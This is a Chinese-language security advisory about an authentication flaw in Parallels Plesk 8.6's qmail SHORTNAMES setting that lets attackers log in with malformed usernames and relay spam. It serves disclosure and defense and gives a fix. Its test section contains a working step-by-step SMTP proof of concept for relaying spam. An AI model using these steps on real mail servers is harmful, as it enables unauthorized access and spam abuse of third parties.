安全研究
安全漏洞
Parallels Plesk Shortnames功能邮件中继漏洞
发布日期:2008-09-01
更新日期:2008-09-02
受影响系统:Parallels Plesk 8.6
描述:
BUGTRAQ ID:
30956
Plesk是用于管理站点的综合控制面板解决方案。
在Plesk中如果为邮件登录启用了SHORTNAMES=1功能的话,QMAIL就会在AUTH LOGIN认证期间接受任何以有效shortname开始的base64编码用户名。这允许攻击者登录到plesk认证模块所保护的邮件或其他服务,通过获得的smtp认证权限中继垃圾邮件。
必须要从smtp(s)_psa删除SHORTNAMES=1才可以修复这个问题,仅仅将其设置为0无法解决。
<*来源:Felix Buenemann (
Felix.Buenemann@gmx.de)
链接:
http://marc.info/?l=bugtraq&m=122029389428233&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
- 确认smtp_psa中包含有:env = SMTPAUTH=1 SHORTNAMES=1
- 生成无效的用户名并base64编码:printf '<validalias><bogustext>' | base64
- 将邮件用户的有效口令编码为base64:printf '<validpass>' | base64
- telnet到邮件服务器的smtp端口:
< 220 HELO mailserver ESMTP
> > AUTH LOGIN
< 334 VXNlcm5hbWU6
> > cGFzc3dvcmQ=
< 334 UGFzc3dvcmQ6
> > cGFzc3dvcmQ=
< 235 go ahead
> > DATA
< 354 go ahead
> > From: Spam Sender <
bogus@bogusdomain.com>
> > To: Spam Receiver <
outside@outsidedomain.com>
> > Subject: Get SPAM cheaply
> >
> > Message body.
> > .
< 250 ok 1219629627 qp 6032
> > QUIT
< 221 mailserver
建议:
厂商补丁:
Parallels
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.parallels.com/en/products/plesk/浏览次数:2873
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |